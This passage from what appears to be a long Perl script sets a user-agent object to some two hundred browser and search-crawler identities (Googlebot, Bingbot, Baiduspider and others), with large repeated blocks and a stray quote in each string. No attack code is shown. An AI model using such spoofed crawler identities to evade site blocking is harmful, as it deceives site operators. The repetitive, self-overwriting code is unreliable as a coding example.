  5265. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5266. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5267. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5268. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5269. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5270. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5271. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5272. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5273. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5274. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5275. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5276. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5277. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5278. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5279. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5280. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5281. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5282. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5283. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5284. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5285. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5286. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5287. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5288. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5289. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5290. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5291. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5292. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5293. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)");
  5294. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  5295. $ua->agent("'Googlebot/2.1 (http://www.googlebot.com/bot.html)");
  5296. $ua->agent("'Opera/9.20 (Windows NT 6.0; U; en)");
  5297. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)");
  5298. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)");
  5299. $ua->agent("'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0");
  5300. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16");
  5301. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)");
  5302. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13");
  5303. $ua->agent("'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)");
  5304. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5305. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)");
  5306. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)");
  5307. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)");
  5308. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8");
  5309. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7");
  5310. $ua->agent("'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
  5311. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5312. $ua->agent("'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)");
  5313. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5314. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5315. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5316. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5317. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5318. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5319. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5320. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5321. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  5322. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5323. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  5324. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5325. $ua->agent("'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)");
  5326. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  5327. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5328. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5329. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  5330. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5331. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  5332. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5333. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5334. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5335. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5336. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5337. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5338. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5339. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5340. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5341. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5342. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5343. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5344. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5345. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5346. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5347. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5348. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5349. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5350. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5351. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5352. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5353. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5354. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5355. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5356. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5357. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5358. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5359. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5360. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5361. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5362. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5363. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5364. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5365. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5366. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5367. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5368. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5369. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5370. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5371. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5372. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5373. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5374. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5375. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5376. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5377. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5378. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5379. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5380. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  5381. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5382. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  5383. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  5384. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  5385. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  5386. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  5387. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  5388. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  5389. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5390. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  5391. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  5392. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  5393. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  5394. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  5395. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  5396. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  5397. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  5398. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  5399. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  5400. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  5401. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  5402. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  5403. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  5404. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  5405. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  5406. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  5407. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  5408. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  5409. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  5410. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  5411. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  5412. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  5413. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  5414. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  5415. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  5416. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  5417. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  5418. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  5419. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  5420. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  5421. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  5422. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  5423. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  5424. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  5425. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  5426. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  5427. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  5428. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  5429. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  5430. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  5431. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  5432. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  5433. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5434. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  5435. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  5436. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  5437. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  5438. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  5439. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  5440. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  5441. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5442. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  5443. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5444. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  5445. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  5446. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  5447. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  5448. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  5449. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  5450. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  5451. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  5452. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  5453. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  5454. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  5455. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  5456. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  5457. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  5458. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  5459. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  5460. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  5461. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  5462. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5463. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  5464. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  5465. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
